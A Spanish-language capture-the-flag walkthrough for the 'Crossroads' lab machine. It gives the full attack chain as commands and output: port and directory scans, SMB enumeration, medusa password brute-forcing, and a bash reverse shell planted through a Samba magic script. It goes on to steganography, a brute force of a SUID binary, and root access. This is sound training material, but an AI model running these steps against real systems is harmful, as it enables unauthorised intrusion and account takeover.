Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.20
❯ nmap -sCV -p80,139,445 -oN 02-targeted.txt 192.168.1.20
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-21 17:03 -04
Nmap scan report for 192.168.1.20
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open oOV Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CROSSROADS
...❯ gobuster dir -u 'http://192.168.1.20' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/note.txt (Status: 200) [Size: 108]
/crossroads.png (Status: 200) [Size: 1100255]
...
❯ cat note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcuEnumeramos SMB con enum4linux y descubrimos el usuario albert:
❯ enum4linux -a 192.168.1.20
...
user:[albert] rid:[0x3e9]
...Hacemos fuerza bruta con medusa:
❯ medusa -u albert -P ~/Documentos/wordlists/rockyou.txt -h 192.168.1.20 -M smbnt
...
ACCOUNT FOUND: [smbnt] Host: 192.168.1.20 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)]
...Listamos los recursos compartidos y, en el home de albert, encontramos un smbshare con un smb.conf que define una magic script:
❯ smbclient //192.168.1.20/albert -U albert
smb: \> ls
smbshare D 0 Tue Mar 2 19:16:13 2021
crossroads.png N 1583196 Tue Mar 2 19:34:03 2021
beroot N 16664 Tue Mar 2 20:02:41 2021
user.txt N 32 Tue Mar 2 20:15:18 2021❯ cat smb.conf
...
[smbshare]
path = /home/albert/smbshare
valid users = albert
writable = yes
magic script = smbscript.sh
...Subimos un smbscript.sh malicioso al recurso; al cerrarse, Samba lo ejecuta y obtenemos una shell:
❯ cat smbscript.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.3/1234 0>&1
❯ smbclient //192.168.1.20/smbshare -U albert
smb: \> put smbscript.sh
❯ ncat -nlvp 1234
Ncat: Connection from 192.168.1.20:48236.
bash: cannot set terminal process group (763): Inappropriate ioctl for device
bash: no job control in this shell
albert@crossroads:/home/albert/smbshare$Obtenemos la primera flag. En el home hay una crossroads.png distinta de la descargada; la procesamos con stegoveritas y obtenemos un wordlist:
❯ stegoveritas crossroads.pngTambién hay un binario SUID beroot que pide una contraseña. Probamos el wordlist con un bucle:
albert@crossroads:/home/albert$ for PASSWD in $(cat wordlist.txt); do echo $PASSWD >> tmp; echo $PASSWD | ./beroot >> tmp; done
albert@crossroads:/home/albert$ cat tmp
...
lemuel
enter password for root
-----------------------
do ls and find root creds
...La contraseña correcta genera un rootcreds con la contraseña de root:
albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___
albert@crossroads:/home/albert$ su root
Password: ___drifting___
id
uid=0(root) gid=0(root) groups=0(root)Obtenemos nuestra flag.
Fin.